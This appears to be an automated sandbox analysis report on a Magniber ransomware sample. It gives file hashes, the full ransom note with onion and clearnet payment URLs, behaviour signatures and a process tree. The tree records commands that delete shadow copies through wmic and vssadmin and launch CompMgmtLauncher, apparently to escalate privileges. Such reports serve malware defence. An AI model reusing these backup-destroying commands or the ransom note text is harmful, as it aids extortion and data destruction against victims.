Overview

overview

10

Static

static

magnibar_f...c4.exe

windows7_x64

10

magnibar_f...c4.exe

windows10_x64

10

Analysis

  • max time kernel
    280s
  • max time network
    273s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    22-07-2021 19:24

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    magnibar_fc1cb9ea6c1d86600f690b0f7c7ea6ab73d401a3b0e899360c4a619aeaed4cc4.exe

  • Size

    21KB

  • MD5

    3802b905937b9212384ce6ed7241d96c

  • SHA1

    9ef9f19a2327bce05bbb5cc23021f5c2b7cd1cec

  • SHA256

    fc1cb9ea6c1d86600f690b0f7c7ea6ab73d401a3b0e899360c4a619aeaed4cc4

  • SHA512

    bac5dc5c299979461ad7eb3f329c9b61042b3d7cb261acdcdd14111741a549c986ea19c871564d9c799d2da7a042ab9f1918efcfcddc3bfe51a4d1aaf3c39d9b

Score
10/10
magniberransomware

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\readme.txt

Family

magniber

Ransom Note
ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://80504cc06614c04092hwcbxhw.5s4ixqul2enwxrqv.onion/hwcbxhw Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://80504cc06614c04092hwcbxhw.plughas.casa/hwcbxhw http://80504cc06614c04092hwcbxhw.dayhit.xyz/hwcbxhw http://80504cc06614c04092hwcbxhw.ownhits.space/hwcbxhw http://80504cc06614c04092hwcbxhw.bestep.cyou/hwcbxhw Note! These are temporary addresses! They will be available for a limited amount of time!
URLs

http://80504cc06614c04092hwcbxhw.5s4ixqul2enwxrqv.onion/hwcbxhw

http://80504cc06614c04092hwcbxhw.plughas.casa/hwcbxhw

http://80504cc06614c04092hwcbxhw.dayhit.xyz/hwcbxhw

http://80504cc06614c04092hwcbxhw.ownhits.space/hwcbxhw

http://80504cc06614c04092hwcbxhw.bestep.cyou/hwcbxhw

Signatures

  • Magniber Ransomware

    Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.

    ransomwaremagniber
  • Process spawned unexpected child process 8 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Modifies extensions of user files 4 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Suspicious use of SetThreadContext 3 IoCs
  • Interacts with shadow copies 2 TTPs 4 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
    adwarespyware
  • Modifies registry class 11 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
    ransomware
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 6 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 61 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1260
    • C:\Users\Admin\AppData\Local\Temp\magnibar_fc1cb9ea6c1d86600f690b0f7c7ea6ab73d401a3b0e899360c4a619aeaed4cc4.exe
      "C:\Users\Admin\AppData\Local\Temp\magnibar_fc1cb9ea6c1d86600f690b0f7c7ea6ab73d401a3b0e899360c4a619aeaed4cc4.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:1724
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:656
    • C:\Windows\system32\cmd.exe
      cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1576
      • C:\Windows\system32\wbem\WMIC.exe
        C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:732
  • C:\Windows\system32\Dwm.exe
    "C:\Windows\system32\Dwm.exe"
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1224
    • C:\Windows\system32\cmd.exe
      cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1848
      • C:\Windows\system32\wbem\WMIC.exe
        C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1588
  • C:\Windows\system32\taskhost.exe
    "taskhost.exe"
    1⤵
    • Modifies extensions of user files
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1124
    • C:\Windows\system32\notepad.exe
      notepad.exe C:\Users\Public\readme.txt
      2⤵
      • Opens file in notepad (likely ransom note)
      PID:1368
    • C:\Windows\system32\cmd.exe
      cmd /c "start http://80504cc06614c04092hwcbxhw.plughas.casa/hwcbxhw^&1^&39803775^&70^&347^&12"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1980
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Program Files\Internet Explorer\iexplore.exe" http://80504cc06614c04092hwcbxhw.plughas.casa/hwcbxhw&1&39803775&70&347&12
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1812
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1812 CREDAT:275457 /prefetch:2
          4⤵
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:1772
    • C:\Windows\system32\cmd.exe
      cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1964
      • C:\Windows\system32\wbem\WMIC.exe
        C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1636
  • C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
    1⤵
      PID:772
    • C:\Windows\system32\cmd.exe
      cmd /c CompMgmtLauncher.exe
      1⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1432
      • C:\Windows\system32\CompMgmtLauncher.exe
        CompMgmtLauncher.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1640
        • C:\Windows\system32\wbem\wmic.exe
          "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
          3⤵
            PID:568
      • C:\Windows\system32\cmd.exe
        cmd /c CompMgmtLauncher.exe
        1⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:1052
        • C:\Windows\system32\CompMgmtLauncher.exe
          CompMgmtLauncher.exe
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1116
          • C:\Windows\system32\wbem\wmic.exe
            "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
            3⤵
              PID:2088
        • C:\Windows\system32\cmd.exe
          cmd /c CompMgmtLauncher.exe
          1⤵
          • Process spawned unexpected child process
          • Suspicious use of WriteProcessMemory
          PID:520
          • C:\Windows\system32\CompMgmtLauncher.exe
            CompMgmtLauncher.exe
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:772
            • C:\Windows\system32\wbem\wmic.exe
              "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
              3⤵
                PID:1076
          • C:\Windows\system32\cmd.exe
            cmd /c CompMgmtLauncher.exe
            1⤵
            • Process spawned unexpected child process
            • Suspicious use of WriteProcessMemory
            PID:1900
            • C:\Windows\system32\CompMgmtLauncher.exe
              CompMgmtLauncher.exe
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:1636
              • C:\Windows\system32\wbem\wmic.exe
                "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                3⤵
                  PID:360
            • C:\Windows\system32\vssadmin.exe
              vssadmin.exe Delete Shadows /all /quiet
              1⤵
              • Process spawned unexpected child process
              • Interacts with shadow copies
              PID:2248
            • C:\Windows\system32\vssadmin.exe
              vssadmin.exe Delete Shadows /all /quiet
              1⤵
              • Process spawned unexpected child process
              • Interacts with shadow copies
              PID:2272
            • C:\Windows\system32\vssadmin.exe
              vssadmin.exe Delete Shadows /all /quiet
              1⤵
              • Process spawned unexpected child process
              • Interacts with shadow copies
              PID:2264
            • C:\Windows\system32\vssadmin.exe
              vssadmin.exe Delete Shadows /all /quiet
              1⤵
              • Process spawned unexpected child process
              • Interacts with shadow copies
              PID:2332
            • C:\Windows\system32\vssvc.exe
              C:\Windows\system32\vssvc.exe
              1⤵
                PID:2388

              Network

              MITRE ATT&CK Enterprise v6

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\PIYIXMFQ.txt
                MD5

                0a288b0a7a37896592013d622f464dec

                SHA1

                9dd97cdc983b259b8a6a9d0b6a078a6bcb02c391

                SHA256

                0aa107809df4dd69c2dc120eadb77a1ce3b6d40b11c7c5e8afbb137acdfdfbb5

                SHA512

                28b18866f09d6f8c017d6b56bc54f8fb6c203891b1739b5b17a152ff90e117b95e91502036eba3b36392b0345c0db1cb44bb327b5512fc362815cb930ad2e165

                Download Submit

              • C:\Users\Admin\Desktop\AddInstall.potx.hwcbxhw
                MD5

                e08dcd1cc8ddf5a1f930e02efd30fdbc

                SHA1

                a52acd53e448d22d7bbc4dd25595befc9a1e63b6

                SHA256

                2da3acbfcd951d33c281709ed0c9240d8e3fd1ec4b217f02a0e4a2f242939ca0

                SHA512

                6555feba4c025596af3e96fdb44574c64db90ab2929777e8eae0bc5c6e760a4a33fa5dbbc83d6db6c43cff512dc75031ec00da959571115487be2cce9fe5c749

                Download Submit

              • C:\Users\Admin\Desktop\DenyPop.xps.hwcbxhw
                MD5

                b30cb150a8d25a58f524d63b63aef228

                SHA1

                3edf7db0d5ce0aeac6712d1a52e6c2ece8412ffa

                SHA256

                52a3a388785bb5309d1a843a1ab21c656aa469627829e65abc401f44a0bb58af

                SHA512

                e7c741edc7e4bf82fc180ea5233edacb05d9758c4b6df0f9a1203c4d5e7d4676c679a480eff562c33e75a0ce0be51de95be6d5e12db0721513b9d118c62ed706

                Download Submit

              • C:\Users\Admin\Desktop\ExitNew.pot.hwcbxhw
                MD5

                71a1c830942dbf1649e8bc36cd166f49

                SHA1

                08df0f6e54bad765bec0a89e56e772df9d5f9969

                SHA256

                1182a8d52e1c870329a5ee928ef4e93c06838dbf90d696be285f385d0f3211b0

                SHA512

                685693da78de0756eff3dd6b1f94cabd98ededf685bff4deebd3f806d067c6f0805a92fdcdd9a630bda31e8e3c1a2b70ef46c572be4191081a775fd02f9660dd

                Download Submit

              • C:\Users\Admin\Desktop\OptimizeSync.jpg.hwcbxhw
                MD5

                61fcaecd7bbf3057908aafb8db9a9658

                SHA1

                384e73d1989c59ca8c8e9f401ccde13a7b0082ba

                SHA256

                1924340c678e53e66b1d746d4d42fff2792a37fc5917235b76a0dd6fcb0ae818

                SHA512

                ae3b2938c472850a5efe4b36d9e8cdd6778233f78a31b186923c4dbcc58308c34648b96374cbcf3772b5b1494e377860dc162901aa8ded0cd75dc1fe81fa3e92

                Download Submit

              • C:\Users\Admin\Desktop\ResolveResume.tif.hwcbxhw
                MD5

                0de0a40dbdc9edc6045f1261367ba7e5

                SHA1

                d17722c7cebc44648d834dc90d7e5af0c2ba2b32

                SHA256

                4d58f1539f92c2d0d78633777229b8e4860843056c290670cd3d2e5feb0f0baa

                SHA512

                5f70dc8a89aafaabf84214b34064e26e482c7869ee6de6d522796180a5d78c431c65a93f236454c26f7fed38011cba513714ea0c47561da2e296ad2715462b01

                Download Submit

              • C:\Users\Admin\Desktop\ResolveShow.potx.hwcbxhw
                MD5

                be534ba0021c24cf362e7b5446d8fabf

                SHA1

                9cb5799741df6e4a65b5d7a5e718183a8b8b5717

                SHA256

                b25a38f4759f291a01c81bca70da1f3396582b8e8b273f9c5e415577f9bc71c5

                SHA512

                b245889309e661f5c34f8839dca5795d605dbbf811186a03f82c9c4b823be527a1b7862a6b0ccae897f48e6e2bd325810e61e945d4823c972b7d8b8330bc4d61

                Download Submit

              • C:\Users\Admin\Desktop\SaveConnect.rtf.hwcbxhw
                MD5

                e6626fe6c3f2c5a627c393304a21f070

                SHA1

                899ec147e1eb9942f027097e167eccde06074224

                SHA256

                8edb877161321018ea3a0ea7e3ed688ffc2fe48bbe4bda4c17936e4274fd6d58

                SHA512

                572953a9af52914a0c38b0063da16218237fb83cbbaf6158cfbf87ab90dc7baee0801a295baa2ed39bd6a147b2e1d3c329bab14a9e852e2cf04d33910d9468e5

                Download Submit

              • C:\Users\Admin\Desktop\readme.txt
                MD5

                1ac8900f1f3c48678830b4c3caf07fcb

                SHA1

                349e7f96bdfaff3d10b74b533cd9dfc89f5000c2

                SHA256

                32fddfa16ec6e99265417bc0813306a9f8d19754c3458da4599dc5dcba53a119

                SHA512

                b3532eb3a0f509d53af7b1aba64285397ec2b495d00807d8b5c47802308f35aedfc7d0f57e915b29f71f76b924744c189d122435687f117bf18752b33f2e4a22

                Download Submit

              • C:\Users\Public\readme.txt
                MD5

                1ac8900f1f3c48678830b4c3caf07fcb

                SHA1

                349e7f96bdfaff3d10b74b533cd9dfc89f5000c2

                SHA256

                32fddfa16ec6e99265417bc0813306a9f8d19754c3458da4599dc5dcba53a119

                SHA512

                b3532eb3a0f509d53af7b1aba64285397ec2b495d00807d8b5c47802308f35aedfc7d0f57e915b29f71f76b924744c189d122435687f117bf18752b33f2e4a22

                Download Submit

              • memory/360-106-0x0000000000000000-mapping.dmp

                Download

              • memory/568-108-0x0000000000000000-mapping.dmp

                Download

              • memory/656-88-0x0000000000000000-mapping.dmp

                Download

              • memory/732-90-0x0000000000000000-mapping.dmp

                Download

              • memory/772-95-0x0000000000000000-mapping.dmp

                Download

              • memory/772-98-0x0000000000000000-mapping.dmp

                Download

              • memory/1076-107-0x0000000000000000-mapping.dmp

                Download

              • memory/1116-100-0x0000000000000000-mapping.dmp

                Download

              • memory/1124-79-0x0000000000210000-0x0000000000214000-memory.dmp

                Filesize

                16KB

                Download

              • memory/1260-60-0x0000000002650000-0x0000000002660000-memory.dmp

                Filesize

                64KB

                Download

              • memory/1368-62-0x000007FEFB571000-0x000007FEFB573000-memory.dmp

                Filesize

                8KB

                Download

              • memory/1368-61-0x0000000000000000-mapping.dmp

                Download

              • memory/1576-84-0x0000000000000000-mapping.dmp

                Download

              • memory/1588-83-0x0000000000000000-mapping.dmp

                Download

              • memory/1636-101-0x0000000000000000-mapping.dmp

                Download

              • memory/1636-82-0x0000000000000000-mapping.dmp

                Download

              • memory/1640-99-0x0000000000000000-mapping.dmp

                Download

              • memory/1724-71-0x0000000001CC0000-0x0000000001CC1000-memory.dmp

                Filesize

                4KB

                Download

              • memory/1724-65-0x00000000000E0000-0x00000000000E1000-memory.dmp

                Filesize

                4KB

                Download

              • memory/1724-68-0x0000000000110000-0x0000000000111000-memory.dmp

                Filesize

                4KB

                Download

              • memory/1724-73-0x0000000001CD0000-0x0000000001CD1000-memory.dmp

                Filesize

                4KB

                Download

              • memory/1724-69-0x0000000001CB0000-0x0000000001CB1000-memory.dmp

                Filesize

                4KB

                Download

              • memory/1724-74-0x0000000001D00000-0x0000000001D01000-memory.dmp

                Filesize

                4KB

                Download

              • memory/1724-75-0x0000000001D10000-0x0000000001D11000-memory.dmp

                Filesize

                4KB

                Download

              • memory/1724-64-0x0000000000020000-0x0000000000025000-memory.dmp

                Filesize

                20KB

                Download

              • memory/1724-96-0x0000000002390000-0x0000000002391000-memory.dmp

                Filesize

                4KB

                Download

              • memory/1724-67-0x0000000000100000-0x0000000000101000-memory.dmp

                Filesize

                4KB

                Download

              • memory/1724-76-0x0000000001D20000-0x0000000001D21000-memory.dmp

                Filesize

                4KB

                Download

              • memory/1724-66-0x00000000000F0000-0x00000000000F1000-memory.dmp

                Filesize

                4KB

                Download

              • memory/1724-77-0x0000000001D30000-0x0000000001D31000-memory.dmp

                Filesize

                4KB

                Download

              • memory/1772-97-0x0000000000000000-mapping.dmp

                Download

              • memory/1812-81-0x0000000000000000-mapping.dmp

                Download

              • memory/1848-80-0x0000000000000000-mapping.dmp

                Download

              • memory/1964-72-0x0000000000000000-mapping.dmp

                Download

              • memory/1980-70-0x0000000000000000-mapping.dmp

                Download

              • memory/2088-109-0x0000000000000000-mapping.dmp

                Download